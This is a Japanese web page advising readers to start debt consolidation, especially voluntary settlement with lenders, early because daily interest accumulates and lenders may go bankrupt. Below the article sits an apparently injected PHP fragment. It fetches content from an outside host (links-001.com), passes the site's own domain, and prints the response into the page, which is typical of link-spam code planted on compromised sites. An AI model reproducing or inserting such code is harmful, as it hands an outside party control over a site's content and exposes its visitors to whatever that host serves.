前へ
次へ

なぜ債務整理は急ぐ方が良いのか

債務整理の手続きは、急ぐ方が良いと言われる事もあります。
確かに状況によっては、早めに整理手続きする方が妥当な事もあります。
その理由の1つは、手数料の増大です。
そもそもカードなどの商品は、手数料は1日単位で発生します。
いわゆる日割り計算になりますから、日額という形で日々支払っていく訳です。
例えば1日につき500円の手数料がかかる場合、借りている限りはずっと支払わなければなりません。
100日借りていれば、5万円の手数料になってしまう訳です。
ところで債務整理を行いますと、負債額を減らすことはできます。
例えば任意整理という手続きがあります。
金融会社と交渉して負債額を減らしていく手続きですが、それは早めに着手するに越した事はありません。
上記のように1日500円の手数料がかかるにしても、早めに減額交渉する方が良いでしょう。
そもそもお金に悩む日数は、短いに越した事はありません。
長い間に渡って悩み続けるよりは、すぐに解決する方が良いでしょう。
それも考慮すれば、やはり整理手続きは早めに始める方が望ましいです。
それと金融会社の問題もあります。
そもそも金融会社の経営状況は、必ずしも順調であるとは限りません。
金融関連の会社によっては、経営状況は少々微妙な事もあります。
万が一会社が無くなってしまった時は、実は整理手続きを行ってもお金を回収できないケースが殆どです。
たとえ弁護士に依頼して任意整理の手続きを行っても、原則としてお金を回収する事はできません。
余りのんびり構えていますと、金融会社が無くなってしまう可能性もある訳です。
現に、法律事務所としてもその点を明示している事も多いです。
法律事務所の公式サイトを見てみても、その点が明記されている事もよくあります。
それも考慮すれば、やはり整理手続きは早めに着手するに越したことはありません。
お金の悩みが深刻な時は、早めに弁護士に相談する方が良いでしょう。
その方が、良い結果に結びつく事も多いです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top